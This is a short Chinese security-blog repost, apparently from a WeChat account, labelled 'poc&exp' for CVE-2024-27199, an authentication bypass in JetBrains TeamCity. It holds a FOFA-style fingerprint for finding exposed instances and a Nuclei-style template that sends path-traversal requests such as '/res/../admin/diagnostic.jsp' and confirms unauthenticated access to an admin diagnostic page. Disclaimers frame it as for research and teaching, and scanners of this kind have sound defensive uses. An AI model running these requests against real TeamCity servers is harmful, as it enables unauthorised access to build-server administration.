免责声明:本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。 |
app="JET_BRAINS-TeamCity"
poc&exp
id: CVE-2024-27199
info:
name: TeamCity < 2023.11.4 - Authentication Bypass
author: DhiyaneshDk
severity: high
description: |
In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible
reference:
https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/
https://nvd.nist.gov/vuln/detail/CVE-2024-27199
classification:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L :
7.3 :
CWE-23 :
metadata:
verified: true
3 :
http.component:"TeamCity" :
tags: cve,cve2024,teamcity,jetbrains,auth-bypass
http:
method: GET
path:
"{{BaseURL}}/res/../admin/diagnostic.jsp"
"{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp"
"{{BaseURL}}/update/../admin/diagnostic.jsp"
true :
matchers:
type: dsl
dsl:
'status_code == 200'
'contains(header, "text/html")'
'contains_all(body, "Debug Logging", "CPU & Memory Usage")'
condition: and
原文始发于微信公众号(漏洞猎人):CVE-2024-27199
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论